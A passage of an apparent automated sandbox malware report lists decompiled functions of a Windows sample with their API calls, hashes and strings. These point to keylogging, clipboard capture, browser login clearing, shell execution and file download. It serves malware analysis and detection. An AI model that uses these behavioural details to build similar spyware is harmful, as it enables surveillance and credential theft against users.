                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                    • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                    • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                    • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                    Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                    • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                    • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                    • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                    Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                    • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                    • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                    • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                    Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                    • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                    • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                    • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                    Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                    • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                    • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                    • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                    Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • Cleared browsers logins and cookies., xrefs: 0040C130
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                    • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                    • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                    • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                    Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                      • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                      • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                    • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                    • Sleep.KERNEL32(00000064), ref: 0040A638
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                    • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                    • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                    • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                    Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                    • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                    • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                    • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                    Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                    • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                    • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                    • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                    Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                    • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                    • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                    • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                    Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 39102293-0
                                    • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                    • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                    • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                    • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                    Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                      • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                    • _UnwindNestedFrames.LIBCMT ref: 00439911
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID:
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                    Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                    • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                    • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                    • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                    Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                      • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                    • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                    Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                    • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                    • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                    • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                    Function 00449EBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                    • GetLastError.KERNEL32 ref: 00449FAB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 203985260-263838557
                                    • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                    • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                    • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                    • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                    Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                    • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                    • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                    • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                    Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                    • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                    • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                    • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                    Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                    • GetLastError.KERNEL32 ref: 0044B884
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                    • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                    • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                    • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                    Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                    • GetLastError.KERNEL32 ref: 0044B796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                    • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                    • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                    • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                    Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 481472006-1507639952
                                    • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                    • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                    • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                    • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                    Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32 ref: 0041667B
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                    • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                    • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                    • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                    Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    • API String ID: 1174141254-2782910960
                                    • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                    • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                    • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                    • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                    Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                    • UnhookWindowsHookEx.USER32 ref: 0040B102
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                    • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                    • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                    • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                    Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
